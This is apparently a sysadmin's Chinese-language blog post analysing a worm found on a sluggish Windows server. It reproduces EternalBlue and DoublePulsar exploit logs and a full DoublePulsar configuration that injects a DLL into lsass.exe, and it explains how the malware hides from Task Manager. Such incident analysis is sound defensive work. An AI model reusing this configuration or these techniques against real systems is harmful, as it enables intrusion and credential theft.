近期用户反馈某台服务器总感觉性能不是很好存在卡顿,于是今天远程上去分析。
打开任务管理器发现CPU使用率非常低,内存使用也在接受范围内(10/64G)。不过我有一个偏好就是不喜欢用系统自带的任务管理器查看资源,顺手把procexp搞上去再看一遍。发现rundll32.exe显示占用了62%左右的CPU资源,加载执行一个名为HalPluginServices.dll。之前看过《深入解析Windows操作系统》,就对前缀Hal(Hardware Abstraction Layer)有个概念。和它并行在svhost.exe下运行的还有spoolsv.exe,第一眼看都是挺系统级的执行文件。移动鼠标到spoolsv.exe查看它的运行路径,显示:C:\Windows\SpeechsTracing\spoolsv.exe。看到Speech前缀我心想是不是微软的讲述人相关功能,碰巧打开目录下面还有一个Microsoft子目录,这时候差点信以为真。但我注意到spoolsv.exe会执行cmd,好奇查看了一下是什么命令:
C:\Windows\SpeechsTracing\Microsoft\svhost.exe > stage1.txt
出于好奇心紧接着打开stage1.txt,看到如下内容:
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump ( bytes):
0x00000000 6e 6f Windows Server
0x00000010 6e R2 Enterpris
0x00000020 e Service P
0x00000030 6b ack .
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
..........DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
这不正是一个SMB攻击,再看一下同目录下的stage2.txt:
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: - Success!
[+] Ping returned Target architecture: x64 (-bit) - XOR Key: 0xEE83B3A2
SMB Connection string is: Windows Server R2 Enterprise Service Pack
Target OS is: R2 x64
Target SP is:
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Backdoor returned code: - Success!
[+] Command completed successfully
<config xmlns="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">
<inputparameters>
<parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
<parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
<value>10.244.251.57</value>
</parameter>
<parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
<parameter name="LogFile" description="Where to write log file" type="String" format="Scalar" required="false"></parameter>
<parameter name="OutConfig" description="Where to write output parameters file" type="String" format="Scalar" valid="true">
<default>stdout</default>
<value>stdout</value>
</parameter>
<parameter name="ValidateOnly" description="Stop execution after parameter validation" type="Boolean" format="Scalar" valid="true">
<default>false</default>
<value>false</value>
</parameter>
<paramchoice name="Protocol" description="Protocol for the backdoor to speak">
<default>SMB</default>
<value>SMB</value>
<paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></paramgroup>
<paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></paramgroup>
</paramchoice>
<paramchoice name="Architecture" description="Architecture of the target OS">
<default>x64</default>
<value>x64</value>
<paramgroup name="x86" description="x86 32-bits"></paramgroup>
<paramgroup name="x64" description="x64 64-bits"></paramgroup>
</paramchoice>
<paramchoice name="Function" description="Operation for backdoor to perform">
<default>OutputInstall</default>
<value>RunDLL</value>
<paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">
<parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Ping" description="Test for presence of backdoor"></paramgroup>
<paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">
<parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">
<value>C:\Windows\SpeechsTracing\Microsoft\\x64.dll</value>
</parameter>
<parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
<parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">
<default>lsass.exe</default>
<value>lsass.exe</value>
</parameter>
<parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true">
<default></default>
<value></value>
</parameter>
</paramgroup>
<paramgroup name="RunShellcode" description="Run raw shellcode">
<parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></parameter>
<parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Uninstall" description="Remove's backdoor from system"></paramgroup>
</paramchoice>
</inputparameters>
<outputparameters>
<paramchoice name="Function" description="Operation for backdoor to perform">
<paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk.">
<parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></parameter>
<parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Ping" description="Test for presence of backdoor">
<parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="RunDLL" description="Inject a DLL into a user mode process.">
<parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
</paramgroup>
<paramgroup name="Uninstall" description="Remove's backdoor from system">
<parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
</paramgroup>
</paramchoice>
</outputparameters>
</config>
基本明白这是一个蠕虫病毒,目录下面还有之前的永恒之蓝(Eternalblue-2.2.0.fb)。这个时候我突然意识到一个现象,原来病毒作者发现用户运行任务管理器时候会自动把rundll32.exe给杀掉,造成一个系统运行占用CPU资源很少的假象,我只是运行了procexp才发现了问题。